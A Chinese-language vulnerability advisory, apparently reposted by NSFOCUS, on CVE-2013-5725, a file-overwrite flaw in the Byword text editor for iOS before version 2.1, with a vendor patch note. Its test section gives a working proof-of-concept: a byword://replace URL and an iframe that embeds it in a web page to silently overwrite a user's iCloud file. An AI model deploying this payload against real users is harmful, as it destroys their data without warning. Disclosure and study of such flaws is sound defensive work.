安全研究
安全漏洞
Byword for iOS 任意文件写漏洞(CVE-2013-5725)
发布日期:2013-09-30
更新日期:2013-10-12
受影响系统:metaclassy Byword for iOS < 2.1
描述:
BUGTRAQ ID:
62718
CVE(CAN) ID:
CVE-2013-5725
Byword是用在iOS及OS X内的文本编辑器,使用了iCloud或Dropbox同步文档。
Byword 2.1支持在iOS上通过X-URL执行某些操作,但其中一个操作用X-URL的文本替代了目标文件内容,且没有警告用户。导致文件被覆盖,且数据永久丢失。
<*来源:Guillaume Ross
链接:
http://archives.neohapsis.com/archives/bugtraq/2013-09/0145.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
byword://replace?location=icloud&path=&name=Important.txt&text=haha
This URL would replace the content of the file "Important.txt" in the user's iCloud container for Byword with "haha". By using iframes, the attacker can embed this attack in a web page. Safari on iOS will automatically launch Byword and overwrite the file.
<iframe src="byword://replace?location=icloud&path=&name=Important.txt&text=haha"></iframe>
建议:
厂商补丁:
metaclassy
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://metaclassy.com/浏览次数:2581
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |